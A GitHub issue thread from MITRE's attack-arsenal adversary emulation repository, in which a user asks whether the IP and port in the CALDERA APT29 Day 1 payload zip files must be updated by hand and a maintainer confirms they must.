search

mitre-attack / attack-arsenal

A collection of red team and adversary emulation resources developed and released by MITRE.
Apache License 2.0
485 stars 79 forks source link

Day 1: CALDERA .zip Payload #17

Closed leegengyu closed 3 years ago

leegengyu commented 3 years ago

Hello,

For Day 1.A of APT29 executed using the CALDERA plugin, phase 7 uses the Modified-SysInternalsSuite.zip payload.

This zip file consists of the following:

  1. accesschk.exe
  2. hostui.txt
  3. javamtsup.exe
  4. psversion.txt
  5. readme.txt

While it is mentioned in a section in the README that the Python script "dynamically updates the payloads to the appropriate IP and port" (which it does in effect), it does not update the payloads in the said zip file to my understanding.

To this end, would like to clarify if are we required to manually update the appropriate IP and port in each of the 5 files above (where required), and zip them when done, before placing them back into the plugins/evals/payloads directory? This would be due to the fact that the Python script only covers .ps1 and .txt files?

Thank you!

jstroud-mitre commented 3 years ago

To this end, would like to clarify if are we required to manually update the appropriate IP and port in each of the 5 files above (where required), and zip them when done, before placing them back into the plugins/evals/payloads directory? This would be due to the fact that the Python script only covers .ps1 and .txt files?

@leegengyu you're absolutely correct! If you want to update the .exe's you'll have to re-generate them and I suggest checking out the evals steps for day-1 and day-2 here for further insights in how the payloads were used so you have an idea on what you'll have to update.

leegengyu commented 3 years ago

Thank you for the clarification @jstroud-mitre !